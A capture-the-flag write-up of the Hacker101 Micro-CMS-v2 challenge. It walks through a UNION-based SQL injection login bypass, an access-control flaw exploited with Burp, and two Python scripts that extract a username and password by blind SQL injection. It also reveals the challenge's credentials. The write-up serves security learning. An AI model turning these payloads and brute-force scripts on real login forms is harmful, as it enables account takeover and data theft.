Home Hacker101 - Micro-CMS-v2
Post
Cancel

Hacker101 - Micro-CMS-v2

The website contains 3 flags, we need to find them all.

Landing page is:

Seems like they fixed the vulnerabilities of the previous Micro-CMS v1 challenge.
Writeup here

Flag 0 - SQL injection

We can crash the login page by entering the username '

We revealed the SQL query used to retrieve the password of the provided username, the DB in use (MariaDB) and the language of the web app (python 2.7)

If we send username=' or '1'='1&password=pass123 we bypass the check on the username but we receive ‘Incorrect password, as the password retrieved from the database doesn’t match the password we provide in the form.

We can leverage the UNION query to control the password loaded from the database. This password will later be checked against the provided password variable in the form.

Since we can control both of them, we can log in without knowing an existing username and password pair.

The POST data we send is:

username=' UNION SELECT "newpass" #&password=newpass

and we successfully log in

We are assigned a JWT Auth token and the flag can be found in the Private Page.

Flag 1 - Broken access control

Every time we try to edit a post we are redirected to the login page because we are required to be authenticated. However, what if we try to directly edit the post with Burp, without following the expected logic flow? It shouldn’t be possible if the access to resources is well implemented. But is it?

Not really.

Our request is:

And we get the flag in the response:

Flag 2 - Blind SQL injection bruteforce

Once we are logged in, we notice a html comment that suggests us to find the real username and password if we don’t have them yet:

1
<!-- You got logged in, congrats!  Do you have the real username and password?  If not, might want to do that! -->

And this is what we are going to do.

We can exploit the SQL vulnerability further. Here we have a blind SQL vulnerability that we can exploit to extract the username and the password one character at a time.

The condition that allows us to bruteforce the username is the Invalid password string that is printed out when the database query returns something.
We can use the LIKE sql statement to make the username match to a certain pattern that we provide. For example we can use it to emulate a startwith() function (e.g. WHERE username LIKE 'a%' will match all the usernames that start with a)

The script we used to bruteforce the username is the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
import re

alphabet="abcdefghijklmnopqrstuvxywzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

url= "http://35.190.155.168/44c8933501/login"

username=""

for x in range(0,32):
    print("cicle: "+str(x))
    for letter in alphabet:
        temp = username+letter
        data= {
                "username": "' or username LIKE '{}%".format(temp),
                "password": 'temp'
                }
        page = requests.post(url,data=data)
        # if previous query returns a match -> Invalid password in response
        if re.search("Invalid password",page.text):
            username=temp
            print("MATCH: "+username)
            break

We end up with the username lelah.

We can now proceed bruteforcing the password, same approach.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
import re

alphabet="abcdefghijklmnopqrstuvxywzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

url= "http://35.190.155.168/44c8933501/login"

password=""

for x in range(0,32):
    print("cicle: "+str(x))
    for letter in alphabet:
        temp = password+letter
        data= {
                "username": "lelah' and password LIKE '{}%".format(temp),
                "password": 'temp'
                }
        page = requests.post(url,data=data)
        # if previous query returns a match -> Invalid password in response
        if re.search("Invalid password",page.text):
            password=temp
            print("MATCH: "+password)
            break

Char by char we retrieve the full password: romaine.

We can now log in using the recovered username and password.
The flag is waiting for us right after the login.

This post is licensed under CC BY 4.0 by the author.